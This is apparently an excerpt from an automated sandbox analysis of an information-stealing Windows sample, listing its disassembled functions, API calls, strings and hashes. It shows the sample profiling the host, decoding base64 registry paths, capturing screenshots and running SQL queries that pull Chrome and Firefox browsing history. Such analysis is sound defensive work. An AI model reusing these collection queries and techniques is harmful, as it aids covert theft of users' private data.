Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
Computer(Username) : , xrefs: 00417364
, xrefs: 004172E5, 00417472, 00417490
LocalTime: , xrefs: 0041743F
EXE_PATH : , xrefs: 004172D3
Windows : , xrefs: 004172F8
Layouts: , xrefs: 0041741C
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
MachineID : , xrefs: 004172B0

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 75899496-943277980
Opcode ID: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
Opcode Fuzzy Hash: dd72d902fec3c835ff41235e95e9197e7833cbbe4dd907cdafe0256d0d0e0796
Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19

Function 00407DD0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

kernel32.dll, xrefs: 00407DFB
WTSQueryUserToken, xrefs: 00407E0D
D, xrefs: 00407E5D
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
wtsapi32.dll, xrefs: 00407E12
CreateEnvironmentBlock, xrefs: 00407E24
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction ID: 099c1664e0e1cd81917be229cd1a82c6e96495822271a1ae00088806601eb9d9
Opcode Fuzzy Hash: 7f96db7897a1f98cdf8b59428a73a971fc0080a3a05c1da7105613a8313ce1c2
Instruction Fuzzy Hash: C2312BB1A443086EDB00EBB5CC42E9E7BBCAB48754F200576F504F72C1DA78AE058A68

Function 00407DD4 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E00
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407E06
LoadLibraryA.KERNEL32(wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E17
GetProcAddress.KERNEL32(00000000,wtsapi32.dll), ref: 00407E1D
LoadLibraryA.KERNEL32(userenv.dll,CreateEnvironmentBlock,00000000,wtsapi32.dll,WTSQueryUserToken,00000000,kernel32.dll,WTSGetActiveConsoleSessionId,00000000,00407EEA,?,-00000001,0041B0FC,0000044D), ref: 00407E2E
GetProcAddress.KERNEL32(00000000,userenv.dll), ref: 00407E34

Part of subcall function 00402754: GetModuleFileNameA.KERNEL32(00000000,?,00000105,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402778

Strings

kernel32.dll, xrefs: 00407DFB
WTSQueryUserToken, xrefs: 00407E0D
D, xrefs: 00407E5D
WTSGetActiveConsoleSessionId, xrefs: 00407DF6
wtsapi32.dll, xrefs: 00407E12
CreateEnvironmentBlock, xrefs: 00407E24
userenv.dll, xrefs: 00407E29

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$FileModuleName
String ID: CreateEnvironmentBlock$D$WTSGetActiveConsoleSessionId$WTSQueryUserToken$kernel32.dll$userenv.dll$wtsapi32.dll
API String ID: 2206896924-1825016774
Opcode ID: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction ID: f930562a739e9fb19de45fac1d58899ce59ec74f5e2b45b4c14d1fb7312bbdc9
Opcode Fuzzy Hash: 27f1b7fea490fa65aef81c43b6e31d3605ad6563d7a28bf75364900d2bc4d32e
Instruction Fuzzy Hash: 28312EB1E443096EDB00EBB5CC42E9E7BFCAB48754F200576F514F72C1DA78AE058A58

Function 00416B94 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B8C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 00416B90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA

Strings

UHJvY2VzczMyTmV4dFc=, xrefs: 00416C45
a2VybmVsMzIuZGxs, xrefs: 00416C61
UHJvY2VzczMyRmlyc3RX, xrefs: 00416C17
kernel32.dll, xrefs: 00416BFF, 00416C2D
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90, xrefs: 00416BE9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc$CurrentProcess
String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
API String ID: 3877065590-4127804628
Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58

Function 004323CA Relevance: 21.1, APIs: 14, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004323E3

Part of subcall function 0042B433: Sleep.KERNEL32(00000000,00423971,00000000), ref: 0042B45B

__calloc_crt.LIBCMT ref: 00432407
_free.LIBCMT ref: 00432415
__calloc_crt.LIBCMT ref: 00432423
_free.LIBCMT ref: 00432433
_free.LIBCMT ref: 00432439
__copytlocinfo_nolock.LIBCMT ref: 00432448
___removelocaleref.LIBCMT ref: 00432461
___freetlocinfo.LIBCMT ref: 00432468
_free.LIBCMT ref: 0043246E
_free.LIBCMT ref: 0043248E
___removelocaleref.LIBCMT ref: 00432495
___freetlocinfo.LIBCMT ref: 0043249C
_free.LIBCMT ref: 004324A2

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock
String ID:
API String ID: 554701316-0
Opcode ID: e2b5f795840abe0cdfee08c392733b5e67dc510a1a83f3380b4137c14902342c
Instruction ID: 60e25583bf21ddf359af24540fb3fb910c2de0748bd9b4453c647fe15e88e3d2
Opcode Fuzzy Hash: e2b5f795840abe0cdfee08c392733b5e67dc510a1a83f3380b4137c14902342c
Instruction Fuzzy Hash: 7D21D535204620FBD7227F26F90291AB7E0DF99724F60812FFC9496261DB7D9C0196DD

Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415FE8, 00416089, 004161AB, 0041624C
RGlzcGxheU5hbWU=, xrefs: 00415FB9, 0041617C
), xrefs: 004160E7, 004162AA
(), xrefs: 00416304
RGlzcGxheVZlcnNpb24=, xrefs: 0041605A, 0041621D
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 00415F72, 00416135
, xrefs: 0041633A

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Open$EnumFreeString$QueryValue
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 811798878-3013244427
Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D

Function 004178B4 Relevance: 18.2, APIs: 12, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00417994
CreateCompatibleDC.GDI32(00000000), ref: 0041799D
CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
SelectObject.GDI32(00000000,00000000), ref: 004179B6
BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
CreateStreamOnHGlobal.COMBASE(00000000,000000FF,00000000), ref: 004179E8
GetHGlobalFromStream.COMBASE(?,?), ref: 00417A76
GlobalLock.KERNEL32(?), ref: 00417A80
GlobalUnlock.KERNEL32(?), ref: 00417AA2
DeleteObject.GDI32(00000000), ref: 00417AA8
DeleteDC.GDI32(00000000), ref: 00417AAE
ReleaseDC.USER32(00000000,00000000), ref: 00417AB6

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Global$Create$CompatibleDeleteObjectStream$BitmapFromLockReleaseSelectUnlock
String ID:
API String ID: 734935659-0
Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58

Function 004324CC Relevance: 15.1, APIs: 10, Instructions: 95COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004324F7
__calloc_crt.LIBCMT ref: 00432517
__lock.LIBCMT ref: 0043252D
__copytlocinfo_nolock.LIBCMT ref: 0043253B
__lock.LIBCMT ref: 00432583
__updatetlocinfoEx_nolock.LIBCMT ref: 00432595
___removelocaleref.LIBCMT ref: 0043259B
__updatetlocinfoEx_nolock.LIBCMT ref: 004325B9

Part of subcall function 00425F69: __getptd_noexit.LIBCMT ref: 00425F69

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__getptd__getptd_noexit
String ID:
API String ID: 1862253221-0
Opcode ID: 01cf2d2ec68c58b77b90d1b7d04f180263721bcb8f41eea91ea22d9b3b4d1951
Instruction ID: 6ee0ea7bdf63bc5c1fe8ff61e410bfb6e0a456f43e437c98b75c721c4f22a120
Opcode Fuzzy Hash: 01cf2d2ec68c58b77b90d1b7d04f180263721bcb8f41eea91ea22d9b3b4d1951
Instruction Fuzzy Hash: 6831D471A05304ABDB14AFA1EA4675E77E0EF48314F50942FF80556292CFBC9A40CB1D

Function 00423603 Relevance: 15.0, APIs: 10, Instructions: 50filememorytimeCOMMON

Download Yara Rule

APIs

WriteProfileStringA.KERNEL32(0043CF08,0043CEF0,0043CEE8), ref: 0042361F
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00423639
GetVolumePathNamesForVolumeNameA.KERNEL32(0043CF28,?,00000000,?), ref: 00423654
EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00423660
ReplaceFileA.KERNEL32(0043CF6C,0043CF58,0043CF50,00000000,00000000,00000000), ref: 0042367B
HeapUnlock.KERNEL32(00000000), ref: 00423683
SetEnvironmentVariableW.KERNEL32(00000000,00000000), ref: 0042368D
GetCommandLineA.KERNEL32 ref: 00423693
GetSystemDirectoryW.KERNEL32(?,00000000), ref: 004236A2
GetModuleHandleA.KERNEL32(0043CF78), ref: 004236AD

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: Volume$CommandConsoleDirectoryEnumEnvironmentFileFormatsHandleHeapLineModuleNameNamesPathProfileReadReplaceStringSystemTimeUnlockVariableWrite
String ID:
API String ID: 1949392090-0
Opcode ID: e3cfa6fea76b87030229f4266a356c8920b630cb0817ea322c581eebe556a332
Instruction ID: 1a9988db0f51be1140eafa59a46ef6f26b5edf116ddf57a622c0808246e52eae
Opcode Fuzzy Hash: e3cfa6fea76b87030229f4266a356c8920b630cb0817ea322c581eebe556a332
Instruction Fuzzy Hash: 4E11E176AC4344BBE7109BA0DD8BF997769AB0CB02F1000A1B305FE0E1CAB4A5458B6D

Function 004129A4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004129E8
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
DeleteFileW.KERNEL32(00000000), ref: 00412C05

Strings

.tmp, xrefs: 00412A03
, xrefs: 00412B98
%TEMP%, xrefs: 00412A23
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
API String ID: 2381671008-351388873
Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58

Function 0041256C Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004125B0
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
DeleteFileW.KERNEL32(00000000), ref: 004127CD

Strings

%TEMP%, xrefs: 004125EB
.tmp, xrefs: 004125CB
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
, xrefs: 00412760

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
API String ID: 2381671008-462058183
Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58

Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58

Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58

Function 0042AB41 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042AB4D

Part of subcall function 0042869D: __getptd_noexit.LIBCMT ref: 004286A0
Part of subcall function 0042869D: __amsg_exit.LIBCMT ref: 004286AD

__amsg_exit.LIBCMT ref: 0042AB6D
__lock.LIBCMT ref: 0042AB7D
